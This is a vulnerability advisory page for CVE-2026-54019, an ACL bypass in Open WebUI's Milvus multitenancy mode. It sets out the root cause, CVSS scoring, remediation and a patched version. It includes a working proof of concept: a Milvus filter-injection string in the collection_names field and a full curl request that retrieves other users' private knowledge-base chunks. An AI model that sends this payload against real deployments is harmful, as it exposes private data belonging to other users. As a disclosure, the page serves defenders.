Skip to main content

Open WebUI CVE-2026-54019

| EUVDEUVD-2026-38524 MEDIUM
Missing Authorization (CWE-862)
2026-06-17 https://github.com/open-webui/open-webui GHSA-p5cp-r7rg-qpxc
6.5
CVSS 3.1 · Vendor: https://github.com/open-webui/open-webui
Share

Severity by source

Vendor (https://github.com/open-webui/open-webui) PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
vuln.today AI
6.5 MEDIUM

Network-reachable API endpoint requires only a low-privilege bearer token (PR:L); single crafted request with no complexity (AC:L); all tenants' private KB data exposed (C:H); attack is purely read-only with no integrity or availability impact.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/open-webui/open-webui).

CVSS VectorVendor: https://github.com/open-webui/open-webui

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 01:53 vuln.today
Analysis Generated
Jun 18, 2026 - 01:53 vuln.today

DescriptionCVE.org

RAG ACL Bypass in Milvus Multitenancy Mode

Summary

This is a bypass of the fix for:

  • GHSA-h36f-rqpx-j5wx
  • CVE-2026-44560
  • "Unauthorized File and Knowledge Base Content Access via RAG Vector Search"

Open WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a resource_id and is interpolated into a Milvus expression without escaping.

An authenticated non-admin user can query:

text
x' or resource_id != '' or resource_id == 'x

This passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:

text
resource_id == 'x' or resource_id != '' or resource_id == 'x'

That returns private knowledge-base chunks belonging to other users.

Affected Configuration

Tested on:

text
Open WebUI: v0.9.5, commit 3660bc00f
VECTOR_DB=milvus
ENABLE_MILVUS_MULTITENANCY_MODE=true

This is not a default-vector-store issue. It affects production deployments using Milvus multitenancy.

Impact

An authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.

Root Cause

ACL permits unknown collection names:

python
# backend/open_webui/retrieval/utils.py
elif not await Knowledges.get_knowledge_by_id(name):
    validated.add(name)

Milvus multitenancy then treats the same name as resource_id and builds unsafe expressions:

python
# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py
expr=f"{RESOURCE_ID_FIELD} == '{resource_id}'"

Affected paths include:

text
POST /api/v1/retrieval/query/collection
POST /api/v1/retrieval/query/doc

PoC

Request:

bash
curl -s -X POST "$TARGET/api/v1/retrieval/query/collection" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/json" \
  --data-binary @- <<'JSON'
{
  "collection_names": [
    "x' or resource_id != '' or resource_id == 'x"
  ],
  "query": "anything",
  "k": 10,
  "hybrid": false
}
JSON

Actual result: private chunks from other users' knowledge collections are returned.

Expected result: request should be rejected with 403 or return no unauthorized content.

Remediation

  1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.
  2. Escape or parameterize Milvus expression values before building filters.
  3. Reject collection names containing quotes/control characters unless they match a known internal format.
  4. Add a regression test for this payload in Milvus multitenancy mode:
text
x' or resource_id != '' or resource_id == 'x

AnalysisAI

Private RAG knowledge-base content belonging to any user can be fully exfiltrated by any authenticated low-privilege account in Open WebUI v0.9.5 deployments running Milvus with multitenancy enabled. This is a second-order bypass of the previously released fix for CVE-2026-44560 (GHSA-h36f-rqpx-j5wx): the prior patch introduced collection-level ACL checks, but the ACL's permissive handling of unknown collection names combined with unsanitized string interpolation into Milvus filter expressions creates an injection path that renders the ACL ineffective. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain valid Open WebUI user credentials
Delivery
Craft collection_names payload with Milvus expression injection
Exploit
POST to /api/v1/retrieval/query/collection with attacker token
Execution
ACL passes unknown collection name as permitted legacy collection
Persist
Milvus multitenancy evaluates tautological filter expression
Impact
Retrieve all indexed private knowledge-base chunks from all tenants

Vulnerability AssessmentAI

Exploitation Exploitation requires all three of the following: (1) a valid Open WebUI user account at any privilege level (no administrative rights needed); (2) the target deployment must be explicitly configured with both VECTOR_DB=milvus and ENABLE_MILVUS_MULTITENANCY_MODE=true - this is a non-default production configuration not present in standard Open WebUI installations; (3) network access to the POST /api/v1/retrieval/query/collection or POST /api/v1/retrieval/query/doc API endpoints. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) accurately reflects the threat model and is well-supported by the evidence: the attack is network-accessible, requires only a valid user account (PR:L), has low complexity confirmed by a single-request PoC, and results in full confidentiality compromise of other users' private knowledge-base content. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker holding any valid Open WebUI user account - including a freshly registered low-privilege account - sends a single unauthenticated-equivalent POST request to /api/v1/retrieval/query/collection with the collection name set to the injection string x' or resource_id != '' or resource_id == 'x. The ACL treats this unrecognized name as a permitted legacy collection and passes it to the Milvus multitenancy layer, which evaluates the resulting tautological expression and returns the full contents of every other user's indexed private knowledge-base chunks. …
Remediation The primary fix is to upgrade Open WebUI to version 0.9.6 or later, which resolves this vulnerability per GitHub Advisory GHSA-p5cp-r7rg-qpxc (https://github.com/open-webui/open-webui/security/advisories/GHSA-p5cp-r7rg-qpxc). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-54019 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy